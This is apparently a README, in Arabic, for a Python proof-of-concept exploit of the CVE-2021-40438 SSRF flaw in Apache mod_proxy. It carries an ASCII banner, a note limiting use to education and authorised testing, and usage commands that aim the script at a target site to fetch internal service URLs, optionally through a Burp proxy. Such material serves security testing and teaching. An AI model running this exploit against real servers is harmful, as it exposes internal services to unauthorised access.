
إثبات مفهوم لاستغلال SSRF لـ CVE-2021-40438 يستهدف Apache mod_proxy. سكربت Python مع دعم وكيل للاختبار المتحكم به والعروض التعليمية.
ملاحظة: مخصصة للأغراض التعليمية واختبارات التحكم فقط. اختبر فقط على الأنظمة التي لديك الإذن بتقييمها.
░█▀▀░█░█░█▀▀░░░░░▀▀▄░▄▀▄░▀▀▄░▀█░░░░░░█░█░▄▀▄░█░█░▀▀█░▄▀▄
░█░░░▀▄▀░█▀▀░▄▄▄░▄▀░░█/█░▄▀░░░█░░▄▄▄░░▀█░█/█░░▀█░░▀▄░▄▀▄
░▀▀▀░░▀░░▀▀▀░░░░░▀▀▀░░▀░░▀▀▀░▀▀▀░░░░░░░▀░░▀░░░░▀░▀▀░░░▀░
# الاستخدام الأساسي
python3 exploit.py "http://vulnerable-site.com" "http://internal-service/"
# مع بروكسي (مثل Burp Suite)
python3 exploit.py "http://vulnerable-site.com" "http://internal-service/" --proxy "http://127.0.0.1:8080"
url: عنوان URL الهدف المعرّض للثغرةssrf: عنوان URL للخدمة الداخلية المطلوب جلبها-p, --proxy: (اختياري) وكيل HTTP لاستخدامه لأغراض التصحيح